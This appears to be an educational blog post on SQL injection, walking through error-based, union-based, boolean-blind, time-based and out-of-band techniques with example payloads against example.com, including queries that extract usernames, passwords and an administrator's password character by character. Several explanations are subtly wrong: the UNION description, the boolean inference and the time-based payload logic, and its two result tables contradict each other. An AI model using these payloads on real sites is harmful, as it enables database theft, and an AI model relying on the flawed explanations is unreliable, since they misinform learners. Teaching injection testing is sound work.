OWASP Top 10 SQL Injection Vulnerability

Hello Today I want to talk about SQL Injection vulnerability in owasp top 10 that ethical hacker like bug bounty hunter should know for web application hacking

Web application database attack, where the attacker inserts SQL commands into the web application

When the SQL command is executed, it will affect the data in the database as follows:

Attackers can read sensitive information such as usernames, passwords, and credit card information from the database.Attackers can modify data in the database, such as adding, deleting, or editing data.Remote code execution on the operating system.

In-Band SQLi(Classic)

In-band SQL injection is a type of SQL injection attack where the attacker uses the same communication channel to both launch the attack and receive the results of the attack. The results of the attack are typically displayed directly on the web application page.

Two common subtypes of in-band SQL injection are:

Error-based SQLi

In error-based SQLi, the attacker crafts a deliberately malformed SQL query. The database will then display an error message that reveals information about the structure of the database. The attacker can then use this information to construct a new, valid SQL query and extract data.

Example:

Input: www.example.com/app.php?id='Output: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for details.

Union-based SQLi

In union-based SQLi, the attacker extracts data from the database by using the UNION SQL operator. The attacker constructs an SQL query that combines the results of two SQL queries.

The first SQL query should be a valid SQL query that retrieves some data from the database.The second SQL query should be a deliberately malformed SQL query that retrieves additional data from the database.

Example:

Input: www.example.com/app.php?id=' union select username, password from users--Output: john:password123 mary:password456

Blind SQL Injection

In Blind SQL Injection, attackers cannot directly read the results of the SQL query, but they can infer information from the response of the web application. There are two main types of Blind SQLi:

1. Boolean-based SQL Injection

In Boolean-based SQL Injection, attackers craft SQL queries that return true or false values. They can then use this information to extract data from the database, one character at a time.

Example:Target: www.example.com/app.php?id=1Backend Query: SELECT title FROM product WHERE id = 1Payload #1 (False): www.example.com/app.php?id=1 AND 1=2Backend Query: SELECT title FROM product WHERE id = 1 AND 1=2Result: Nothing is returned on the page.Inference: The condition 1=2 is always false, so the query returns no results. This means that the attacker's input did not affect the query.Payload #2 (True): www.example.com/app.php?id=1 AND 1=1Backend Query: SELECT title FROM product WHERE id = 1 AND 1=1Result: The title of product ID 1 is returned on the page.Inference: The condition 1=1 is always true, so the query returns the title of product ID 1. This means that the attacker's input affected the query.Attack: The attacker can use this technique to extract the password of the user “Administrator”, one character at a time.Payload: www.example.com/app.php?id=1 AND SUBSTRING((SELECT password FROM users WHERE username = 'Administrator'), 1, 1) = 's'Backend Query: SELECT title FROM product WHERE id = 1 AND SUBSTRING((SELECT password FROM users WHERE username = 'Administrator'), 1, 1) = 's'Result: Nothing is returned on the page.Inference: "s" is not the first character of the hashed password.Payload: www.example.com/app.php?id=1 AND SUBSTRING((SELECT password FROM users WHERE username = 'Administrator'), 1, 1) = 'e'Backend Query: SELECT title FROM product WHERE id = 1 AND SUBSTRING((SELECT password FROM users WHERE username = 'Administrator'), 1, 1) = 'e'Result: The title of product ID 1 is returned on the page.Inference: "e" is the first character of the hashed password.

2. Time-based SQL Injection

In Time-based SQL Injection, attackers craft SQL queries that cause the database to respond more slowly. They can then use this information to extract data from the database.

Example:Input: www.example.com/users.php?username=' AND sleep(5)--Output: SELECT * FROM users WHERE username = '' AND sleep(5)--Explanation:The sleep(5) function causes the database to wait for 5 seconds before returning the results of the query.If the attacker knows that the username they are trying to guess is the first character of the administrator’s hashed password, they can use the sleep(5) function to confirm this.For example, if the first character of the administrator’s hashed password is an ‘a’, then the following payload will cause the database to wait for 5 seconds before returning the results:www.example.com/users.php?username='a' AND sleep(5)--If the first character of the administrator’s hashed password is not an ‘a’, then the following payload will not cause the database to wait for 5 seconds:www.example.com/users.php?username='b' AND sleep(5)--

Out-of-Band SQLi (OAST)

The attacker uses a communication channel outside of the normal web application channel.The attacker constructs an SQL query that affects an external system.The external system sends data back to the attacker.The attacker analyzes the data to extract information from the database.

In computer programs, a “valid” value refers to a value that is entered into the program and produces a positive and repeatable result.

Example:/products?id=1 displays the product with ID 1 (valid)/products?id=0 displays a 404 page because there is no product with ID 0 (invalid)

Using “valid” values initially is important because:

It makes it easier to find SQL injectionsIt helps programs run more stably-- Vulnerability App
+--------------------------+--------------------------+---------------------+
|Input | Result in Vulnerable App | Result in Secure App|
+--------------------------+--------------------------+---------------------+
|valid search term | 200 OK | 200 OK |
+--------------------------+--------------------------+---------------------+
|valid search term' | 404 Not Found | 404 Not Found |
+--------------------------+--------------------------+---------------------+
|valid search term' -- - | 200 OK | 404 Not Found |
+--------------------------+--------------------------+---------------------+

-- Security App
+--------------------------+--------------------------+---------------------+
|Input | Result in Vulnerable App | Result in Secure App|
+--------------------------+--------------------------+---------------------+
|valid search term | 404 Not Found | 404 Not Found |
+--------------------------+--------------------------+---------------------+
|valid search term' | 404 Not Found | 404 Not Found |
+--------------------------+--------------------------+---------------------+
|valid search term' -- - | 404 Not Found | 404 Not Found |
+--------------------------+--------------------------+---------------------+

Remember! Hacking is illegle you can not hacking people or company without permission. This blog post is made for educational only. So you can learn and practice by your own place.